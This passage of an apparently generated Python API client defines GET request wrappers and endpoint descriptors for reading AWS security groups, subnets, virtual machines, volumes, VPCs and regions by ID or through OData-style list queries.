        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        CloudAwsSecurityGroupResponse, or the request thread when called
        asynchronously.
    """
    # Fill in any transport option the caller did not override.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: GET /api/v1/cloud/AwsSecurityGroups.
# Binds the private request wrapper to the public attribute callers use.
self.get_cloud_aws_security_group_list = _Endpoint(
    settings={
        'response_type': (CloudAwsSecurityGroupResponse,),
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsSecurityGroups',
        'operation_id': 'get_cloud_aws_security_group_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {"ALLPAGES": "allpages", "NONE": "none"},
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # OData query options carry a '$' prefix on the wire; 'at' and
        # 'tags' are plain query parameters.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter of this operation travels in the query string.
        'location_map': {param: 'query' for param in (
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags')},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_security_group_list
)
def __get_cloud_aws_subnet_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.AwsSubnet' resource.

    Synchronous by default; pass async_req=True to run the request
    asynchronously, in which case a thread object is returned.

    >>> thread = api.get_cloud_aws_subnet_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        CloudAwsSubnet, or the request thread when called
        asynchronously.
    """
    # Fill in any transport option the caller did not override.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: GET /api/v1/cloud/AwsSubnets/{Moid}.
# Binds the private request wrapper to the public attribute callers use.
self.get_cloud_aws_subnet_by_moid = _Endpoint(
    settings={
        'response_type': (CloudAwsSubnet,),
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsSubnets/{Moid}',
        'operation_id': 'get_cloud_aws_subnet_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        # 'Moid' is interpolated into the path template above.
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_subnet_by_moid
)
def __get_cloud_aws_subnet_list(
    self,
    **kwargs
):
    """Read a 'cloud.AwsSubnet' resource.

    Synchronous by default; pass async_req=True to run the request
    asynchronously, in which case a thread object is returned.

    >>> thread = api.get_cloud_aws_subnet_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData $filter expression selecting the entries to
            return. [optional] server default ""
        orderby (str): Properties used to sort the collection.
            [optional]
        top (int): Maximum number of resources to return. [optional]
            server default 100
        skip (int): Number of resources to skip. [optional] server
            default 0
        select (str): Subset of properties to return. [optional] server
            default ""
        expand (str): Additional attributes or related resources to
            include. [optional]
        apply (str): One or more "$apply" set transformations
            (aggregate/groupby), applied consecutively. [optional]
        count (bool): Return the count of matching resources instead of
            the resources themselves. [optional]
        inlinecount (str): Request an inline count of matching resources
            alongside the results. [optional] server default "allpages"
        at (str): Like "$filter", but matches versioning information
            properties. [optional]
        tags (str): Request a summary of Tag utilization for this
            resource. [optional]
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        CloudAwsSubnetResponse, or the request thread when called
        asynchronously.
    """
    # Fill in any transport option the caller did not override.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: GET /api/v1/cloud/AwsSubnets.
# Binds the private request wrapper to the public attribute callers use.
self.get_cloud_aws_subnet_list = _Endpoint(
    settings={
        'response_type': (CloudAwsSubnetResponse,),
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsSubnets',
        'operation_id': 'get_cloud_aws_subnet_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {"ALLPAGES": "allpages", "NONE": "none"},
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # OData query options carry a '$' prefix on the wire; 'at' and
        # 'tags' are plain query parameters.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter of this operation travels in the query string.
        'location_map': {param: 'query' for param in (
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags')},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_subnet_list
)
def __get_cloud_aws_virtual_machine_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.AwsVirtualMachine' resource.

    Synchronous by default; pass async_req=True to run the request
    asynchronously, in which case a thread object is returned.

    >>> thread = api.get_cloud_aws_virtual_machine_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        CloudAwsVirtualMachine, or the request thread when called
        asynchronously.
    """
    # Fill in any transport option the caller did not override.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: GET /api/v1/cloud/AwsVirtualMachines/{Moid}.
# Binds the private request wrapper to the public attribute callers use.
self.get_cloud_aws_virtual_machine_by_moid = _Endpoint(
    settings={
        'response_type': (CloudAwsVirtualMachine,),
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsVirtualMachines/{Moid}',
        'operation_id': 'get_cloud_aws_virtual_machine_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        # 'Moid' is interpolated into the path template above.
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_virtual_machine_by_moid
)
def __get_cloud_aws_virtual_machine_list(
    self,
    **kwargs
):
    """Read a 'cloud.AwsVirtualMachine' resource.

    Synchronous by default; pass async_req=True to run the request
    asynchronously, in which case a thread object is returned.

    >>> thread = api.get_cloud_aws_virtual_machine_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData $filter expression selecting the entries to
            return. [optional] server default ""
        orderby (str): Properties used to sort the collection.
            [optional]
        top (int): Maximum number of resources to return. [optional]
            server default 100
        skip (int): Number of resources to skip. [optional] server
            default 0
        select (str): Subset of properties to return. [optional] server
            default ""
        expand (str): Additional attributes or related resources to
            include. [optional]
        apply (str): One or more "$apply" set transformations
            (aggregate/groupby), applied consecutively. [optional]
        count (bool): Return the count of matching resources instead of
            the resources themselves. [optional]
        inlinecount (str): Request an inline count of matching resources
            alongside the results. [optional] server default "allpages"
        at (str): Like "$filter", but matches versioning information
            properties. [optional]
        tags (str): Request a summary of Tag utilization for this
            resource. [optional]
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        CloudAwsVirtualMachineResponse, or the request thread when
        called asynchronously.
    """
    # Fill in any transport option the caller did not override.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: GET /api/v1/cloud/AwsVirtualMachines.
# Binds the private request wrapper to the public attribute callers use.
self.get_cloud_aws_virtual_machine_list = _Endpoint(
    settings={
        'response_type': (CloudAwsVirtualMachineResponse,),
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsVirtualMachines',
        'operation_id': 'get_cloud_aws_virtual_machine_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {"ALLPAGES": "allpages", "NONE": "none"},
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # OData query options carry a '$' prefix on the wire; 'at' and
        # 'tags' are plain query parameters.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every parameter of this operation travels in the query string.
        'location_map': {param: 'query' for param in (
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags')},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_virtual_machine_list
)
def __get_cloud_aws_volume_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.AwsVolume' resource. # noqa: E501
    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned.
    >>> thread = api.get_cloud_aws_volume_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): Return the response body without
            status code and headers. Default is True.
        _preload_content (bool): If False, return the raw
            urllib3.HTTPResponse without reading/decoding the body.
            Default is True.
        _request_timeout (float/tuple): Total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): Type-check data sent to the server.
            Default is True.
        _check_return_type (bool): Type-check data received from the
            server. Default is True.
        _host_index (int/None): Index of the server to use. Default is
            read from the configuration.
        async_req (bool): Execute the request asynchronously.
    Returns:
        CloudAwsVolume
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the client-control options without clobbering caller values.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    # The path parameter is forwarded through kwargs like everything else.
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/AwsVolumes/{Moid}.
# Binds the private implementation above as a public callable attribute and
# declares the required 'moid' path parameter.
self.get_cloud_aws_volume_by_moid = _Endpoint(
    settings={
        'response_type': (CloudAwsVolume,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate entry emitted by the generator; harmless
        ],
        'endpoint_path': '/api/v1/cloud/AwsVolumes/{Moid}',
        'operation_id': 'get_cloud_aws_volume_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
        },
        # Python name -> wire name used in the URL template.
        'attribute_map': {
            'moid': 'Moid',
        },
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_volume_by_moid
)
def __get_cloud_aws_volume_list(
    self,
    **kwargs
):
    """Read a 'cloud.AwsVolume' resource. # noqa: E501
    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned.
    >>> thread = api.get_cloud_aws_volume_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData $filter predicate selecting the entries to return. [optional]
        orderby (str): Properties used to sort the collection. [optional]
        top (int): Maximum number of resources to return. [optional]
        skip (int): Number of resources to skip in the response. [optional]
        select (str): Subset of properties to return. [optional]
        expand (str): Additional attributes or related resources to include. [optional]
        apply (str): Aggregation/groupby transformations to apply. [optional]
        count (bool): Return only the count of matching resources. [optional]
        inlinecount (str): Request an inline count with the results. [optional]
        at (str): Filter on versioning information properties. [optional]
        tags (str): Request a summary of Tag utilization. [optional]
        _return_http_data_only (bool): Return the response body without
            status code and headers. Default is True.
        _preload_content (bool): If False, return the raw
            urllib3.HTTPResponse without reading/decoding the body.
            Default is True.
        _request_timeout (float/tuple): Total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): Type-check data sent to the server.
            Default is True.
        _check_return_type (bool): Type-check data received from the
            server. Default is True.
        _host_index (int/None): Index of the server to use. Default is
            read from the configuration.
        async_req (bool): Execute the request asynchronously.
    Returns:
        CloudAwsVolumeResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the client-control options without clobbering caller values.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/AwsVolumes.
# Binds the private implementation above as a public callable attribute and
# declares how the OData-style query parameters are validated and serialized.
self.get_cloud_aws_volume_list = _Endpoint(
    settings={
        'response_type': (CloudAwsVolumeResponse,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate entry emitted by the generator; harmless
        ],
        'endpoint_path': '/api/v1/cloud/AwsVolumes',
        'operation_id': 'get_cloud_aws_volume_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # Every query parameter accepted by this operation.
        'all': [
            'filter',
            'orderby',
            'top',
            'skip',
            'select',
            'expand',
            'apply',
            'count',
            'inlinecount',
            'at',
            'tags',
        ],
        'required': [],
        'nullable': [
        ],
        # Parameters restricted to the 'allowed_values' sets below.
        'enum': [
            'inlinecount',
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        # Python-side types used for input type checking.
        'openapi_types': {
            'filter':
                (str,),
            'orderby':
                (str,),
            'top':
                (int,),
            'skip':
                (int,),
            'select':
                (str,),
            'expand':
                (str,),
            'apply':
                (str,),
            'count':
                (bool,),
            'inlinecount':
                (str,),
            'at':
                (str,),
            'tags':
                (str,),
        },
        # Python parameter name -> wire name (OData params carry a '$' prefix).
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # All parameters of this operation travel in the query string.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_volume_list
)
def __get_cloud_aws_vpc_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.AwsVpc' resource. # noqa: E501
    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned.
    >>> thread = api.get_cloud_aws_vpc_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): Return the response body without
            status code and headers. Default is True.
        _preload_content (bool): If False, return the raw
            urllib3.HTTPResponse without reading/decoding the body.
            Default is True.
        _request_timeout (float/tuple): Total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): Type-check data sent to the server.
            Default is True.
        _check_return_type (bool): Type-check data received from the
            server. Default is True.
        _host_index (int/None): Index of the server to use. Default is
            read from the configuration.
        async_req (bool): Execute the request asynchronously.
    Returns:
        CloudAwsVpc
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the client-control options without clobbering caller values.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    # The path parameter is forwarded through kwargs like everything else.
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/AwsVpcs/{Moid}.
# Binds the private implementation above as a public callable attribute and
# declares the required 'moid' path parameter.
self.get_cloud_aws_vpc_by_moid = _Endpoint(
    settings={
        'response_type': (CloudAwsVpc,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate entry emitted by the generator; harmless
        ],
        'endpoint_path': '/api/v1/cloud/AwsVpcs/{Moid}',
        'operation_id': 'get_cloud_aws_vpc_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
        },
        # Python name -> wire name used in the URL template.
        'attribute_map': {
            'moid': 'Moid',
        },
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_vpc_by_moid
)
def __get_cloud_aws_vpc_list(
    self,
    **kwargs
):
    """Read a 'cloud.AwsVpc' resource. # noqa: E501
    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned.
    >>> thread = api.get_cloud_aws_vpc_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData $filter predicate selecting the entries to return. [optional]
        orderby (str): Properties used to sort the collection. [optional]
        top (int): Maximum number of resources to return. [optional]
        skip (int): Number of resources to skip in the response. [optional]
        select (str): Subset of properties to return. [optional]
        expand (str): Additional attributes or related resources to include. [optional]
        apply (str): Aggregation/groupby transformations to apply. [optional]
        count (bool): Return only the count of matching resources. [optional]
        inlinecount (str): Request an inline count with the results. [optional]
        at (str): Filter on versioning information properties. [optional]
        tags (str): Request a summary of Tag utilization. [optional]
        _return_http_data_only (bool): Return the response body without
            status code and headers. Default is True.
        _preload_content (bool): If False, return the raw
            urllib3.HTTPResponse without reading/decoding the body.
            Default is True.
        _request_timeout (float/tuple): Total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): Type-check data sent to the server.
            Default is True.
        _check_return_type (bool): Type-check data received from the
            server. Default is True.
        _host_index (int/None): Index of the server to use. Default is
            read from the configuration.
        async_req (bool): Execute the request asynchronously.
    Returns:
        CloudAwsVpcResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the client-control options without clobbering caller values.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/AwsVpcs.
# Binds the private implementation above as a public callable attribute and
# declares how the OData-style query parameters are validated and serialized.
self.get_cloud_aws_vpc_list = _Endpoint(
    settings={
        'response_type': (CloudAwsVpcResponse,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate entry emitted by the generator; harmless
        ],
        'endpoint_path': '/api/v1/cloud/AwsVpcs',
        'operation_id': 'get_cloud_aws_vpc_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # Every query parameter accepted by this operation.
        'all': [
            'filter',
            'orderby',
            'top',
            'skip',
            'select',
            'expand',
            'apply',
            'count',
            'inlinecount',
            'at',
            'tags',
        ],
        'required': [],
        'nullable': [
        ],
        # Parameters restricted to the 'allowed_values' sets below.
        'enum': [
            'inlinecount',
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        # Python-side types used for input type checking.
        'openapi_types': {
            'filter':
                (str,),
            'orderby':
                (str,),
            'top':
                (int,),
            'skip':
                (int,),
            'select':
                (str,),
            'expand':
                (str,),
            'apply':
                (str,),
            'count':
                (bool,),
            'inlinecount':
                (str,),
            'at':
                (str,),
            'tags':
                (str,),
        },
        # Python parameter name -> wire name (OData params carry a '$' prefix).
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # All parameters of this operation travel in the query string.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_vpc_list
)
def __get_cloud_regions_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.Regions' resource. # noqa: E501
    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned.
    >>> thread = api.get_cloud_regions_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): Return the response body without
            status code and headers. Default is True.
        _preload_content (bool): If False, return the raw
            urllib3.HTTPResponse without reading/decoding the body.
            Default is True.
        _request_timeout (float/tuple): Total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): Type-check data sent to the server.
            Default is True.
        _check_return_type (bool): Type-check data received from the
            server. Default is True.
        _host_index (int/None): Index of the server to use. Default is
            read from the configuration.
        async_req (bool): Execute the request asynchronously.
    Returns:
        CloudRegions
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the client-control options without clobbering caller values.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    # The path parameter is forwarded through kwargs like everything else.
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/Regions/{Moid}.
# Binds the private implementation above as a public callable attribute and
# declares the required 'moid' path parameter.
self.get_cloud_regions_by_moid = _Endpoint(
    settings={
        'response_type': (CloudRegions,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate entry emitted by the generator; harmless
        ],
        'endpoint_path': '/api/v1/cloud/Regions/{Moid}',
        'operation_id': 'get_cloud_regions_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
        },
        # Python name -> wire name used in the URL template.
        'attribute_map': {
            'moid': 'Moid',
        },
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_regions_by_moid
)
def __get_cloud_regions_list(
    self,
    **kwargs
):
